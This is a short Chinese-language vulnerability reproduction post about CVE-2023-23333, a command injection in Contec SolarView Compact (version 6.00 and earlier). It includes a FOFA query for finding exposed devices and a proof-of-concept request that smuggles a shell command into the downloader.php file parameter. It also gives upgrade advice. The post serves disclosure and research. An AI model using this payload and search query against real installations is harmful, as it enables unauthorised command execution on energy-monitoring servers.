CVE-2023-23333—SolarView Compact RCE 任意命令执行

2023年7月4日09:58:22评论184 views字数 313阅读1分2秒阅读模式

漏洞简介

Contec SolarView Compact 是日本 Contec 公司的一个应用系统，提供光伏发电测量系统。其6.00版本以前存在命令注入漏洞，攻击者可以通过 downloader.php 绕过内部限制执行命令，通过该漏洞在服务器端任意执行代码，获取服务器权限。
影响版本

SolarView Compact <= 6.00

FOFA语句

body="SolarView Compact" && title="Top"

CVE-2023-23333—SolarView Compact RCE 任意命令执行

漏洞复现

CVE-2023-23333—SolarView Compact RCE 任意命令执行

抓包，替换POC

downloader.php?file=%3Bpwd%00.zip

CVE-2023-23333—SolarView Compact RCE 任意命令执行

修复建议

升级版本至最新

CVE-2023-23333—SolarView Compact RCE 任意命令执行

原文始发于微信公众号（巢安实验室）：CVE-2023-23333—SolarView Compact RCE 任意命令执行

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

本文由 admin 发表于 2023年7月4日09:58:22
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
CVE-2023-23333—SolarView Compact RCE 任意命令执行https://cn-sec.com/archives/1852725.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

漏洞复现 || Vite import存在任意文件读取漏洞